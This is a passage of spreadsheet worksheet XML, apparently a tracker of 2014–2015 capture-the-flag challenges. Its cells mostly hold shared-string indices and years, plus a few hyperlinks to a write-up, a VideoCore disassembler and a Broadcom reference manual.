        <v>128</v>
      </c>
      <c r="E61" s="36" t="s">
        <v>909</v>
      </c>
      <c r="F61" s="36" t="s">
        <v>2167</v>
      </c>
      <c r="G61" s="46" t="str">
        <f>HYPERLINK("https://github.com/pwning/public-writeup/blob/master/9447ctf2014/misc/polydata/polydata.md","polydata writeup")</f>
        <v>polydata writeup</v>
      </c>
      <c r="H61" s="68"/>
      <c r="I61" s="68"/>
      <c r="J61" s="68"/>
    </row>
    <row r="62">
      <c r="A62" s="36">
        <v>9447.0</v>
      </c>
      <c r="B62" s="36">
        <v>2014.0</v>
      </c>
      <c r="C62" s="36" t="s">
        <v>2168</v>
      </c>
      <c r="D62" s="36" t="s">
        <v>48</v>
      </c>
      <c r="E62" s="45" t="s">
        <v>676</v>
      </c>
      <c r="F62" s="45" t="s">
        <v>2169</v>
      </c>
      <c r="G62" s="36" t="s">
        <v>2170</v>
      </c>
      <c r="H62" s="68"/>
      <c r="I62" s="68"/>
      <c r="J62" s="68"/>
    </row>
    <row r="63">
      <c r="A63" s="36">
        <v>9447.0</v>
      </c>
      <c r="B63" s="36">
        <v>2014.0</v>
      </c>
      <c r="C63" s="36" t="s">
        <v>2171</v>
      </c>
      <c r="D63" s="36" t="s">
        <v>48</v>
      </c>
      <c r="E63" s="36"/>
      <c r="F63" s="45" t="s">
        <v>2172</v>
      </c>
      <c r="G63" s="36" t="s">
        <v>2173</v>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="150" t="s">
        <v>464</v>
      </c>
      <c r="B64" s="150">
        <v>2014.0</v>
      </c>
      <c r="C64" s="150" t="s">
        <v>2174</v>
      </c>
      <c r="D64" s="150" t="s">
        <v>23</v>
      </c>
      <c r="E64" s="150" t="s">
        <v>2160</v>
      </c>
      <c r="F64" s="151" t="s">
        <v>2175</v>
      </c>
      <c r="G64" s="150" t="s">
        <v>2176</v>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="30" t="s">
        <v>464</v>
      </c>
      <c r="B65" s="31">
        <v>2014.0</v>
      </c>
      <c r="C65" s="30" t="s">
        <v>2177</v>
      </c>
      <c r="D65" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E65" s="30" t="s">
        <v>2160</v>
      </c>
      <c r="F65" s="35" t="s">
        <v>2178</v>
      </c>
      <c r="G65" s="30" t="s">
        <v>2176</v>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="30" t="s">
        <v>464</v>
      </c>
      <c r="B66" s="31">
        <v>2014.0</v>
      </c>
      <c r="C66" s="30" t="s">
        <v>2179</v>
      </c>
      <c r="D66" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E66" s="35" t="s">
        <v>676</v>
      </c>
      <c r="F66" s="35" t="s">
        <v>2180</v>
      </c>
      <c r="G66" s="40" t="s">
        <v>2176</v>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="30" t="s">
        <v>464</v>
      </c>
      <c r="B67" s="31">
        <v>2014.0</v>
      </c>
      <c r="C67" s="30" t="s">
        <v>2181</v>
      </c>
      <c r="D67" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E67" s="32" t="s">
        <v>407</v>
      </c>
      <c r="F67" s="35" t="s">
        <v>2182</v>
      </c>
      <c r="G67" s="30" t="s">
        <v>2183</v>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="30" t="s">
        <v>464</v>
      </c>
      <c r="B68" s="31">
        <v>2014.0</v>
      </c>
      <c r="C68" s="30" t="s">
        <v>2184</v>
      </c>
      <c r="D68" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E68" s="30" t="s">
        <v>2185</v>
      </c>
      <c r="F68" s="35" t="s">
        <v>2186</v>
      </c>
      <c r="G68" s="40" t="s">
        <v>2176</v>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="30" t="s">
        <v>472</v>
      </c>
      <c r="B69" s="31">
        <v>2014.0</v>
      </c>
      <c r="C69" s="30" t="s">
        <v>2188</v>
      </c>
      <c r="D69" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E69" s="32" t="s">
        <v>407</v>
      </c>
      <c r="F69" s="30" t="s">
        <v>2189</v>
      </c>
      <c r="G69" s="40" t="s">
        <v>2176</v>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="s">
        <v>1125</v>
      </c>
      <c r="B70" s="43">
        <v>2014.0</v>
      </c>
      <c r="C70" s="5" t="s">
        <v>2190</v>
      </c>
      <c r="D70" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E70" s="44" t="s">
        <v>1873</v>
      </c>
      <c r="F70" s="5" t="s">
        <v>2192</v>
      </c>
      <c r="G70" s="5" t="s">
        <v>2193</v>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="23" t="s">
        <v>481</v>
      </c>
      <c r="B71" s="24">
        <v>2014.0</v>
      </c>
      <c r="C71" s="23" t="s">
        <v>2197</v>
      </c>
      <c r="D71" s="23" t="s">
        <v>48</v>
      </c>
      <c r="E71" s="28"/>
      <c r="F71" s="23" t="s">
        <v>2198</v>
      </c>
      <c r="G71" s="23" t="s">
        <v>2199</v>
      </c>
      <c r="K71" s="28"/>
    </row>
    <row r="72">
      <c r="A72" s="23" t="s">
        <v>481</v>
      </c>
      <c r="B72" s="24">
        <v>2014.0</v>
      </c>
      <c r="C72" s="23" t="s">
        <v>2201</v>
      </c>
      <c r="D72" s="23" t="s">
        <v>23</v>
      </c>
      <c r="E72" s="23" t="s">
        <v>2203</v>
      </c>
      <c r="F72" s="23" t="s">
        <v>2204</v>
      </c>
      <c r="G72" s="23" t="s">
        <v>2205</v>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="113" t="s">
        <v>472</v>
      </c>
      <c r="B73" s="115">
        <v>2014.0</v>
      </c>
      <c r="C73" s="113" t="s">
        <v>2209</v>
      </c>
      <c r="D73" s="113" t="s">
        <v>128</v>
      </c>
      <c r="E73" s="111" t="s">
        <v>300</v>
      </c>
      <c r="F73" s="113" t="s">
        <v>2210</v>
      </c>
      <c r="G73" s="30"/>
      <c r="H73" s="30" t="s">
        <v>300</v>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="30" t="s">
        <v>464</v>
      </c>
      <c r="B74" s="31">
        <v>2014.0</v>
      </c>
      <c r="C74" s="30" t="s">
        <v>2213</v>
      </c>
      <c r="D74" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E74" s="35" t="s">
        <v>407</v>
      </c>
      <c r="F74" s="35" t="s">
        <v>2225</v>
      </c>
      <c r="G74" s="30" t="s">
        <v>2227</v>
      </c>
      <c r="H74" s="30" t="s">
        <v>2228</v>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="17">
        <v>42521.0</v>
      </c>
      <c r="B75" s="7"/>
      <c r="C75" s="6"/>
      <c r="D75" s="6"/>
      <c r="E75" s="6"/>
      <c r="F75" s="6"/>
      <c r="G75" s="6"/>
      <c r="H75" s="6"/>
      <c r="I75" s="8"/>
      <c r="J75" s="8"/>
      <c r="K75" s="9"/>
      <c r="L75" s="9"/>
      <c r="M75" s="9"/>
      <c r="N75" s="9"/>
      <c r="O75" s="9"/>
      <c r="P75" s="9"/>
      <c r="Q75" s="9"/>
      <c r="R75" s="9"/>
      <c r="S75" s="9"/>
      <c r="T75" s="9"/>
      <c r="U75" s="9"/>
      <c r="V75" s="9"/>
      <c r="W75" s="9"/>
      <c r="X75" s="9"/>
      <c r="Y75" s="9"/>
      <c r="Z75" s="9"/>
    </row>
    <row r="76">
      <c r="A76" s="5" t="s">
        <v>578</v>
      </c>
      <c r="B76" s="43">
        <v>2014.0</v>
      </c>
      <c r="C76" s="5" t="s">
        <v>2233</v>
      </c>
      <c r="D76" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E76" s="5" t="s">
        <v>676</v>
      </c>
      <c r="F76" s="5" t="s">
        <v>381</v>
      </c>
      <c r="G76" s="5" t="s">
        <v>2237</v>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="s">
        <v>578</v>
      </c>
      <c r="B77" s="43">
        <v>2014.0</v>
      </c>
      <c r="C77" s="5" t="s">
        <v>2238</v>
      </c>
      <c r="D77" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E77" s="5" t="s">
        <v>2240</v>
      </c>
      <c r="F77" s="5" t="s">
        <v>2241</v>
      </c>
      <c r="G77" s="5" t="s">
        <v>2242</v>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="s">
        <v>578</v>
      </c>
      <c r="B78" s="43">
        <v>2014.0</v>
      </c>
      <c r="C78" s="5" t="s">
        <v>2245</v>
      </c>
      <c r="D78" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E78" s="5" t="s">
        <v>676</v>
      </c>
      <c r="F78" s="5" t="s">
        <v>2246</v>
      </c>
      <c r="G78" s="5" t="s">
        <v>2248</v>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="s">
        <v>578</v>
      </c>
      <c r="B79" s="43">
        <v>2014.0</v>
      </c>
      <c r="C79" s="5" t="s">
        <v>2251</v>
      </c>
      <c r="D79" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E79" s="2" t="s">
        <v>407</v>
      </c>
      <c r="F79" s="5" t="s">
        <v>679</v>
      </c>
      <c r="G79" s="5" t="s">
        <v>342</v>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="s">
        <v>578</v>
      </c>
      <c r="B80" s="43">
        <v>2014.0</v>
      </c>
      <c r="C80" s="5" t="s">
        <v>2254</v>
      </c>
      <c r="D80" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E80" s="5" t="s">
        <v>2256</v>
      </c>
      <c r="F80" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G80" s="5" t="s">
        <v>342</v>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="s">
        <v>578</v>
      </c>
      <c r="B81" s="43">
        <v>2014.0</v>
      </c>
      <c r="C81" s="5" t="s">
        <v>2260</v>
      </c>
      <c r="D81" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E81" s="5" t="s">
        <v>407</v>
      </c>
      <c r="F81" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G81" s="5" t="s">
        <v>2262</v>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="s">
        <v>578</v>
      </c>
      <c r="B82" s="43">
        <v>2014.0</v>
      </c>
      <c r="C82" s="5" t="s">
        <v>2263</v>
      </c>
      <c r="D82" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E82" s="5" t="s">
        <v>676</v>
      </c>
      <c r="F82" s="5" t="s">
        <v>2264</v>
      </c>
      <c r="G82" s="54"/>
    </row>
    <row r="83">
      <c r="A83" s="30" t="s">
        <v>1168</v>
      </c>
      <c r="B83" s="31">
        <v>2014.0</v>
      </c>
      <c r="C83" s="30" t="s">
        <v>2265</v>
      </c>
      <c r="D83" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E83" s="30" t="s">
        <v>2266</v>
      </c>
      <c r="F83" s="30" t="s">
        <v>2267</v>
      </c>
      <c r="G83" s="30" t="s">
        <v>2268</v>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="30" t="s">
        <v>619</v>
      </c>
      <c r="B84" s="31">
        <v>2014.0</v>
      </c>
      <c r="C84" s="30" t="s">
        <v>2269</v>
      </c>
      <c r="D84" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E84" s="30" t="s">
        <v>2270</v>
      </c>
      <c r="F84" s="30" t="s">
        <v>2272</v>
      </c>
      <c r="G84" s="30" t="s">
        <v>2274</v>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="30" t="s">
        <v>619</v>
      </c>
      <c r="B85" s="31">
        <v>2014.0</v>
      </c>
      <c r="C85" s="30" t="s">
        <v>2275</v>
      </c>
      <c r="D85" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E85" s="30" t="s">
        <v>997</v>
      </c>
      <c r="F85" s="30" t="s">
        <v>2280</v>
      </c>
      <c r="G85" s="30"/>
    </row>
    <row r="86">
      <c r="A86" s="30" t="s">
        <v>619</v>
      </c>
      <c r="B86" s="31">
        <v>2014.0</v>
      </c>
      <c r="C86" s="30" t="s">
        <v>2282</v>
      </c>
      <c r="D86" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E86" s="30" t="s">
        <v>2284</v>
      </c>
      <c r="F86" s="48" t="s">
        <v>2286</v>
      </c>
      <c r="G86" s="30" t="s">
        <v>2288</v>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="40" t="s">
        <v>638</v>
      </c>
      <c r="B87" s="40">
        <v>2014.0</v>
      </c>
      <c r="C87" s="40" t="s">
        <v>2292</v>
      </c>
      <c r="D87" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E87" s="40" t="s">
        <v>2294</v>
      </c>
      <c r="F87" s="40" t="s">
        <v>2295</v>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="17">
        <v>42528.0</v>
      </c>
      <c r="B88" s="7"/>
      <c r="C88" s="6"/>
      <c r="D88" s="6"/>
      <c r="E88" s="6"/>
      <c r="F88" s="6"/>
      <c r="G88" s="6"/>
      <c r="H88" s="6"/>
      <c r="I88" s="8"/>
      <c r="J88" s="8"/>
      <c r="K88" s="9"/>
      <c r="L88" s="9"/>
      <c r="M88" s="9"/>
      <c r="N88" s="9"/>
      <c r="O88" s="9"/>
      <c r="P88" s="9"/>
      <c r="Q88" s="9"/>
      <c r="R88" s="9"/>
      <c r="S88" s="9"/>
      <c r="T88" s="9"/>
      <c r="U88" s="9"/>
      <c r="V88" s="9"/>
      <c r="W88" s="9"/>
      <c r="X88" s="9"/>
      <c r="Y88" s="9"/>
      <c r="Z88" s="9"/>
    </row>
    <row r="89">
      <c r="A89" s="30" t="s">
        <v>648</v>
      </c>
      <c r="B89" s="31">
        <v>2014.0</v>
      </c>
      <c r="C89" s="30" t="s">
        <v>2297</v>
      </c>
      <c r="D89" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E89" s="35" t="s">
        <v>2298</v>
      </c>
      <c r="F89" s="35" t="s">
        <v>2299</v>
      </c>
      <c r="G89" s="40" t="s">
        <v>2300</v>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="30" t="s">
        <v>648</v>
      </c>
      <c r="B90" s="31">
        <v>2014.0</v>
      </c>
      <c r="C90" s="30" t="s">
        <v>2301</v>
      </c>
      <c r="D90" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E90" s="30" t="s">
        <v>2302</v>
      </c>
      <c r="F90" s="30" t="s">
        <v>2303</v>
      </c>
      <c r="G90" s="30" t="s">
        <v>2305</v>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="30" t="s">
        <v>654</v>
      </c>
      <c r="B91" s="31">
        <v>2014.0</v>
      </c>
      <c r="C91" s="30" t="s">
        <v>2306</v>
      </c>
      <c r="D91" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E91" s="35" t="s">
        <v>407</v>
      </c>
      <c r="F91" s="35" t="s">
        <v>2309</v>
      </c>
      <c r="G91" s="30" t="s">
        <v>2310</v>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="30" t="s">
        <v>654</v>
      </c>
      <c r="B92" s="31">
        <v>2014.0</v>
      </c>
      <c r="C92" s="30" t="s">
        <v>2312</v>
      </c>
      <c r="D92" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E92" s="35" t="s">
        <v>997</v>
      </c>
      <c r="F92" s="35" t="s">
        <v>2313</v>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="30" t="s">
        <v>690</v>
      </c>
      <c r="B93" s="31">
        <v>2014.0</v>
      </c>
      <c r="C93" s="30" t="s">
        <v>2314</v>
      </c>
      <c r="D93" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E93" s="30" t="s">
        <v>997</v>
      </c>
      <c r="F93" s="35" t="s">
        <v>2315</v>
      </c>
      <c r="G93" s="30" t="s">
        <v>1322</v>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="30" t="s">
        <v>690</v>
      </c>
      <c r="B94" s="31">
        <v>2014.0</v>
      </c>
      <c r="C94" s="30" t="s">
        <v>2316</v>
      </c>
      <c r="D94" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E94" s="30" t="s">
        <v>997</v>
      </c>
      <c r="F94" s="35" t="s">
        <v>2317</v>
      </c>
      <c r="G94" s="30" t="s">
        <v>1322</v>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="30" t="s">
        <v>690</v>
      </c>
      <c r="B95" s="31">
        <v>2014.0</v>
      </c>
      <c r="C95" s="30" t="s">
        <v>2318</v>
      </c>
      <c r="D95" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E95" s="30" t="s">
        <v>2319</v>
      </c>
      <c r="F95" s="35" t="s">
        <v>2321</v>
      </c>
      <c r="G95" s="30" t="s">
        <v>2322</v>
      </c>
      <c r="H95" s="30"/>
      <c r="I95" s="30"/>
      <c r="J95" s="30"/>
      <c r="K95" s="30"/>
    </row>
    <row r="96">
      <c r="A96" s="40" t="s">
        <v>662</v>
      </c>
      <c r="B96" s="40">
        <v>2014.0</v>
      </c>
      <c r="C96" s="40" t="s">
        <v>2323</v>
      </c>
      <c r="D96" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E96" s="40" t="s">
        <v>407</v>
      </c>
      <c r="F96" s="40" t="s">
        <v>2324</v>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B97" s="40">
        <v>2014.0</v>
      </c>
      <c r="C97" s="40" t="s">
        <v>2325</v>
      </c>
      <c r="D97" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E97" s="40" t="s">
        <v>2326</v>
      </c>
      <c r="F97" s="40" t="s">
        <v>2327</v>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="153" t="s">
        <v>673</v>
      </c>
      <c r="B98" s="154">
        <v>2015.0</v>
      </c>
      <c r="C98" s="153" t="s">
        <v>2339</v>
      </c>
      <c r="D98" s="153" t="s">
        <v>23</v>
      </c>
      <c r="E98" s="153" t="s">
        <v>1873</v>
      </c>
      <c r="F98" s="153" t="s">
        <v>2342</v>
      </c>
      <c r="G98" s="153" t="s">
        <v>2343</v>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="s">
        <v>673</v>
      </c>
      <c r="B99" s="43">
        <v>2015.0</v>
      </c>
      <c r="C99" s="5" t="s">
        <v>2344</v>
      </c>
      <c r="D99" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E99" s="5" t="s">
        <v>1873</v>
      </c>
      <c r="F99" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G99" s="5" t="s">
        <v>2345</v>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="s">
        <v>673</v>
      </c>
      <c r="B100" s="43">
        <v>2015.0</v>
      </c>
      <c r="C100" s="5" t="s">
        <v>2347</v>
      </c>
      <c r="D100" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E100" s="5" t="s">
        <v>676</v>
      </c>
      <c r="F100" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G100" s="2" t="s">
        <v>342</v>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="17">
        <v>42535.0</v>
      </c>
      <c r="B101" s="7"/>
      <c r="C101" s="6"/>
      <c r="D101" s="6"/>
      <c r="E101" s="6"/>
      <c r="F101" s="6"/>
      <c r="G101" s="6"/>
      <c r="H101" s="6"/>
      <c r="I101" s="8"/>
      <c r="J101" s="8"/>
      <c r="K101" s="9"/>
      <c r="L101" s="9"/>
      <c r="M101" s="9"/>
      <c r="N101" s="9"/>
      <c r="O101" s="9"/>
      <c r="P101" s="9"/>
      <c r="Q101" s="9"/>
      <c r="R101" s="9"/>
      <c r="S101" s="9"/>
      <c r="T101" s="9"/>
      <c r="U101" s="9"/>
      <c r="V101" s="9"/>
      <c r="W101" s="9"/>
      <c r="X101" s="9"/>
      <c r="Y101" s="9"/>
      <c r="Z101" s="9"/>
    </row>
    <row r="102">
      <c r="A102" s="30" t="s">
        <v>695</v>
      </c>
      <c r="B102" s="31">
        <v>2015.0</v>
      </c>
      <c r="C102" s="30" t="s">
        <v>2351</v>
      </c>
      <c r="D102" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E102" s="35" t="s">
        <v>2352</v>
      </c>
      <c r="F102" s="35" t="s">
        <v>2353</v>
      </c>
      <c r="G102" s="33" t="str">
        <f>HYPERLINK("http://hermanhermitage.github.io/videocore-disjs/dis.html"," RaspberryPi VideoCore VI Dissassembler")</f>
        <v> RaspberryPi VideoCore VI Dissassembler</v>
      </c>
      <c r="H102" s="33" t="str">
        <f>HYPERLINK("http://www.broadcom.com/docs/support/videocore/VideoCoreIV-AG100-R.pdf","Broadcom Videocore 4 reference")</f>
        <v>Broadcom Videocore 4 reference</v>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="30" t="s">
        <v>695</v>
      </c>
      <c r="B103" s="31">
        <v>2015.0</v>
      </c>
      <c r="C103" s="30" t="s">
        <v>2362</v>
      </c>
      <c r="D103" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E103" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F103" s="35" t="s">
        <v>2364</v>
      </c>
      <c r="G103" s="30"/>
    </row>
    <row r="104">
      <c r="A104" s="30" t="s">
        <v>695</v>
      </c>
      <c r="B104" s="31">
        <v>2015.0</v>
      </c>
      <c r="C104" s="30" t="s">
        <v>2367</v>
      </c>
      <c r="D104" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E104" s="30" t="s">
        <v>2369</v>
      </c>
      <c r="F104" s="35" t="s">
        <v>2371</v>
      </c>
      <c r="G104" s="30"/>
    </row>
    <row r="105">
      <c r="A105" s="30" t="s">
        <v>695</v>
      </c>
      <c r="B105" s="31">
        <v>2015.0</v>
      </c>
      <c r="C105" s="30" t="s">
        <v>2373</v>
      </c>
      <c r="D105" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E105" s="30" t="s">
        <v>2374</v>
      </c>
      <c r="F105" s="35" t="s">
        <v>2375</v>
      </c>
      <c r="G105" s="30"/>
      <c r="H105" s="30"/>
    </row>
    <row r="106">
      <c r="A106" s="30" t="s">
        <v>690</v>
      </c>
      <c r="B106" s="31">
        <v>2014.0</v>
      </c>
      <c r="C106" s="30" t="s">
        <v>2378</v>
      </c>
      <c r="D106" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E106" s="30" t="s">
        <v>1467</v>
      </c>
      <c r="F106" s="30" t="s">
        <v>2382</v>
      </c>
      <c r="G106" s="30" t="s">
        <v>2383</v>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="s">
        <v>701</v>
      </c>
      <c r="B107" s="43">
        <v>2015.0</v>
      </c>
      <c r="C107" s="5" t="s">
        <v>2385</v>
      </c>
      <c r="D107" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E107" s="5" t="s">
        <v>676</v>
      </c>
      <c r="F107" s="5" t="s">
        <v>381</v>
      </c>
      <c r="G107" s="3"/>
    </row>
    <row r="108">
      <c r="A108" s="5" t="s">
        <v>701</v>
      </c>
      <c r="B108" s="43">
        <v>2015.0</v>
      </c>
      <c r="C108" s="5" t="s">
        <v>2389</v>
      </c>
      <c r="D108" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E108" s="5" t="s">
        <v>676</v>
      </c>
      <c r="F108" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G108" s="5" t="s">
        <v>2390</v>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="s">
        <v>701</v>
      </c>
      <c r="B109" s="43">
        <v>2015.0</v>
      </c>
      <c r="C109" s="5" t="s">
        <v>2391</v>
      </c>
      <c r="D109" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E109" s="5" t="s">
        <v>2392</v>
      </c>
      <c r="F109" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G109" s="3"/>
    </row>
    <row r="110">
      <c r="A110" s="5" t="s">
        <v>701</v>
      </c>
      <c r="B110" s="43">
        <v>2015.0</v>
      </c>
      <c r="C110" s="5" t="s">
        <v>2393</v>
      </c>
      <c r="D110" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E110" s="5" t="s">
        <v>407</v>
      </c>
      <c r="F110" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G110" s="3"/>
    </row>
    <row r="111">
      <c r="A111" s="5" t="s">
        <v>701</v>
      </c>
      <c r="B111" s="43">
        <v>2015.0</v>
      </c>
      <c r="C111" s="5" t="s">
        <v>2394</v>
      </c>
      <c r="D111" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E111" s="5" t="s">
        <v>300</v>
      </c>
      <c r="F111" s="5" t="s">
        <v>2397</v>
      </c>
      <c r="G111" s="3"/>
    </row>
    <row r="112">
      <c r="A112" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B112" s="40">
        <v>2014.0</v>
      </c>
      <c r="C112" s="40" t="s">
        <v>2401</v>
      </c>
      <c r="D112" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E112" s="40" t="s">
        <v>2402</v>
      </c>
      <c r="F112" s="40" t="s">
        <v>2403</v>
      </c>
      <c r="G112" s="40" t="s">
        <v>2404</v>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B113" s="40">
        <v>2014.0</v>
      </c>
      <c r="C113" s="40" t="s">
        <v>2406</v>
      </c>
      <c r="D113" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E113" s="40" t="s">
        <v>407</v>
      </c>
      <c r="F113" s="40" t="s">
        <v>2409</v>
      </c>
      <c r="G113" s="40" t="s">
        <v>2410</v>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="153" t="s">
        <v>726</v>
      </c>
      <c r="B114" s="154">
        <v>2015.0</v>
      </c>
      <c r="C114" s="153" t="s">
        <v>2411</v>
      </c>
      <c r="D114" s="153" t="s">
        <v>23</v>
      </c>
      <c r="E114" s="153" t="s">
        <v>407</v>
      </c>
      <c r="F114" s="153" t="s">
        <v>601</v>
      </c>
      <c r="G114" s="128"/>
    </row>
    <row r="115">
      <c r="A115" s="5" t="s">
        <v>726</v>
      </c>
      <c r="B115" s="43">
        <v>2015.0</v>
      </c>
      <c r="C115" s="5" t="s">
        <v>2413</v>
      </c>
      <c r="D115" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E115" s="5" t="s">
        <v>407</v>
      </c>
      <c r="F115" s="5" t="s">
        <v>682</v>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B116" s="40">
        <v>2014.0</v>
      </c>
      <c r="C116" s="40" t="s">
        <v>2416</v>
      </c>
      <c r="D116" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E116" s="40" t="s">
        <v>407</v>
      </c>
      <c r="F116" s="40" t="s">
        <v>2420</v>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="17">
        <v>42538.0</v>
      </c>
      <c r="B117" s="7"/>
      <c r="C117" s="6"/>
      <c r="D117" s="6"/>
      <c r="E117" s="6"/>
      <c r="F117" s="6"/>
      <c r="G117" s="6"/>
      <c r="H117" s="6"/>
      <c r="I117" s="8"/>
      <c r="J117" s="8"/>
      <c r="K117" s="9"/>
      <c r="L117" s="9"/>
      <c r="M117" s="9"/>
      <c r="N117" s="9"/>
      <c r="O117" s="9"/>
      <c r="P117" s="9"/>
      <c r="Q117" s="9"/>
      <c r="R117" s="9"/>
      <c r="S117" s="9"/>
      <c r="T117" s="9"/>
      <c r="U117" s="9"/>
      <c r="V117" s="9"/>
      <c r="W117" s="9"/>
      <c r="X117" s="9"/>
      <c r="Y117" s="9"/>
      <c r="Z117" s="9"/>
    </row>
    <row r="118">
      <c r="A118" s="5" t="s">
        <v>741</v>
      </c>
      <c r="B118" s="43">
        <v>2015.0</v>
      </c>
      <c r="C118" s="5" t="s">
        <v>2426</v>
      </c>
      <c r="D118" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E118" s="5" t="s">
        <v>407</v>
      </c>
      <c r="F118" s="5" t="s">
        <v>679</v>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="s">
        <v>741</v>
      </c>
      <c r="B119" s="43">
        <v>2015.0</v>
      </c>
      <c r="C119" s="5" t="s">
        <v>2431</v>
      </c>
      <c r="D119" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E119" s="5" t="s">
        <v>407</v>
      </c>
      <c r="F119" s="5" t="s">
        <v>2433</v>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="s">
        <v>741</v>
      </c>
      <c r="B120" s="43">
        <v>2015.0</v>
      </c>
      <c r="C120" s="5" t="s">
        <v>2435</v>
      </c>
      <c r="D120" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E120" s="5" t="s">
        <v>2438</v>
      </c>
      <c r="F120" s="5" t="s">
        <v>2440</v>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="153" t="s">
        <v>741</v>
      </c>
      <c r="B121" s="154">
        <v>2015.0</v>
      </c>
      <c r="C121" s="153" t="s">
        <v>2443</v>
      </c>
      <c r="D121" s="153" t="s">
        <v>23</v>
      </c>
      <c r="E121" s="153" t="s">
        <v>676</v>
      </c>
      <c r="F121" s="153" t="s">
        <v>2449</v>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="s">
        <v>754</v>
      </c>
      <c r="B122" s="43">
        <v>2015.0</v>
      </c>
      <c r="C122" s="5" t="s">
        <v>2450</v>
      </c>
      <c r="D122" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E122" s="5" t="s">
        <v>676</v>
      </c>
      <c r="F122" s="5" t="s">
        <v>679</v>
      </c>
      <c r="G122" s="5" t="s">
        <v>342</v>
      </c>
    </row>
